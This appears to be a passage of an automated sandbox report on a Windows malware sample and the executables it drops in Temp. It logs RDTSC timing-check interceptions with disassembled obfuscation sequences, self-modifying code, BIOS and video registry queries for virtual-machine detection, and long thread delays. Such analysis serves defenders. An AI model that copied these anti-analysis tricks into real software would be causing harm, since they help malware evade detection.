Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56000A4 second address: 56000AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56000AA second address: 56000BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56000BA second address: 56000F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007EFDB8CDCB0Ah 0x0000000f mov dx, cx 0x00000012 pop esi 0x00000013 mov ebx, 0998FB62h 0x00000018 popad 0x00000019 mov dword ptr [esp], ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007EFDB8CDCB14h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56000F1 second address: 5600103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8F26A1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610046 second address: 5610085 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFDB8CDCB12h 0x00000008 adc ax, EA08h 0x0000000d jmp 00007EFDB8CDCB0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007EFDB8CDCB0Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610085 second address: 561008B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561008B second address: 561008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561015C second address: 5610160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610160 second address: 5610164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610164 second address: 561016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561016A second address: 561019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFDB8CDCB0Ch 0x00000009 adc al, 00000078h 0x0000000c jmp 00007EFDB8CDCB0Bh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 add dword ptr [esp], 54CBBEC4h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov ecx, ebx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561019D second address: 56101A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56101A3 second address: 56101D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007EFE291624CDh 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 jmp 00007EFDB8CDCB0Eh 0x00000057 sub esi, esi 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c call 00007EFDB8CDCB0Dh 0x00000061 pop esi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561021D second address: 5610223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610223 second address: 5610227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610227 second address: 561022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561022B second address: 561023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 561023B second address: 5610250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610250 second address: 5610271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007EFE29151226h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610271 second address: 5610284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5610284 second address: 5610289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56207D8 second address: 5620817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFDB8F26A1Eh 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFDB8F26A27h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5620817 second address: 562082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFDB8CDCB14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562082F second address: 5620833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5620833 second address: 562084E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 69F715F3h 0x0000000f mov ch, 1Eh 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov edi, 1839A612h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562084E second address: 56208A0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFDB8F26A23h 0x00000008 jmp 00007EFDB8F26A23h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dh, ch 0x00000012 popad 0x00000013 mov esi, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 pushad 0x00000018 mov bx, 3F22h 0x0000001c movsx edx, si 0x0000001f popad 0x00000020 mov si, E02Bh 0x00000024 popad 0x00000025 test esi, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007EFDB8F26A1Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56208A0 second address: 56208B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007EFE2914A611h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56208B8 second address: 56208BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56208BC second address: 56208C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56208C2 second address: 56208C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56208C8 second address: 56208CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56208CC second address: 562090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AF459Ch], 05h 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 je 00007EFE293AC5CEh 0x00000019 jmp 00007EFDB8F26A20h 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007EFDB8F26A27h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: C9DD6C second address: C9DD70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: C9DD70 second address: C9DD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007EFDB8F26A2Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: C9DD9D second address: C9DDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E02F18 second address: E02F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E02F1C second address: E02F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1C4E1 second address: E1C501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1C501 second address: E1C524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8CDCB12h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007EFDB8CDCB06h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1C96F second address: E1C979 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFDB8F26A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1C979 second address: E1C98F instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFDB8CDCB0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1C98F second address: E1C9E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007EFDB8F26A1Eh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jg 00007EFDB8F26A16h 0x0000001a js 00007EFDB8F26A18h 0x00000020 pushad 0x00000021 jmp 00007EFDB8F26A22h 0x00000026 jns 00007EFDB8F26A16h 0x0000002c push eax 0x0000002d pop eax 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 jo 00007EFDB8F26A16h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1C9E1 second address: E1C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1CB2C second address: E1CB3E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFDB8F26A16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1CB3E second address: E1CB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1CCC3 second address: E1CCDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A1Fh 0x00000009 jbe 00007EFDB8F26A16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1E801 second address: E1E806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1E806 second address: E1E8A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007EFDB8F26A16h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007EFDB8F26A1Eh 0x00000014 pop eax 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b jne 00007EFDB8F26A1Ch 0x00000021 jnc 00007EFDB8F26A18h 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a jmp 00007EFDB8F26A1Dh 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push esi 0x00000034 jmp 00007EFDB8F26A1Eh 0x00000039 pop esi 0x0000003a pop eax 0x0000003b mov dword ptr [ebp+122D32FBh], ecx 0x00000041 push 00000003h 0x00000043 jmp 00007EFDB8F26A28h 0x00000048 push 00000000h 0x0000004a mov edi, 72528A04h 0x0000004f push 00000003h 0x00000051 mov ecx, dword ptr [ebp+122D2AE9h] 0x00000057 mov dword ptr [ebp+122D3BB4h], esi 0x0000005d push 9227682Ah 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1E978 second address: E1E9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007EFDB8CDCB0Dh 0x0000000b pop edi 0x0000000c popad 0x0000000d add dword ptr [esp], 1D56AF01h 0x00000014 pushad 0x00000015 or si, 5F81h 0x0000001a add edi, 598DF900h 0x00000020 popad 0x00000021 sub edx, 5C354963h 0x00000027 push 00000003h 0x00000029 mov dword ptr [ebp+122D34AEh], eax 0x0000002f push 00000000h 0x00000031 sbb esi, 0C6E2521h 0x00000037 jg 00007EFDB8CDCB08h 0x0000003d mov edi, eax 0x0000003f push 00000003h 0x00000041 pushad 0x00000042 sub edx, 2F1F4011h 0x00000048 mov ch, bh 0x0000004a popad 0x0000004b call 00007EFDB8CDCB09h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007EFDB8CDCB0Eh 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1E9E8 second address: E1E9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1E9ED second address: E1EA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFDB8CDCB14h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1EA0D second address: E1EA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007EFDB8F26A1Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe RDTSC instruction interceptor: First address: E1EA2C second address: E1EA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007EFDB8CDCB08h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007EFDB8CDCB06h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F3EBB2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10ED4B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 111671C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F3EBEB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Special instruction interceptor: First address: C9DE15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Special instruction interceptor: First address: C9B4B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Special instruction interceptor: First address: E6BF6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Special instruction interceptor: First address: 53EDE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Special instruction interceptor: First address: EE1F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Special instruction interceptor: First address: 53EE9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Special instruction interceptor: First address: 6E335D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Special instruction interceptor: First address: 53C5CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E3EDE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E3EE9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FE335D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E3C5CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Special instruction interceptor: First address: CA33A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Special instruction interceptor: First address: 9BEBB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Special instruction interceptor: First address: B6D4B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Special instruction interceptor: First address: B9671C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Special instruction interceptor: First address: 9BEBEB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Special instruction interceptor: First address: 8ADD40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Special instruction interceptor: First address: ADED53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Special instruction interceptor: First address: B5DE15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Special instruction interceptor: First address: B5B4B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Special instruction interceptor: First address: D2BF6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Special instruction interceptor: First address: DA1F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Special instruction interceptor: First address: 68EDE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Special instruction interceptor: First address: 68EE9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Special instruction interceptor: First address: 83335D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Special instruction interceptor: First address: 68C5CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Special instruction interceptor: First address: D1DE15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Special instruction interceptor: First address: D1B4B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Special instruction interceptor: First address: EEBF6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Special instruction interceptor: First address: B633A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Special instruction interceptor: First address: ACEDE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Special instruction interceptor: First address: ACEE9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Special instruction interceptor: First address: C7335D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Special instruction interceptor: First address: ACC5CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Special instruction interceptor: First address: F61F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Special instruction interceptor: First address: D233A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Memory allocated: 4830000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Memory allocated: 4A00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Memory allocated: 4830000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Memory allocated: 4B00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Memory allocated: 4CE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Memory allocated: 4B00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Memory allocated: 4750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Memory allocated: 4AB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Memory allocated: 49D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00E1C826 rdtsc 3_2_00E1C826
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AE7AB sldt word ptr [eax+00007366h] 0_3_016AE7AB
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Thread delayed: delay time: 922337203685477 Jump to behavior
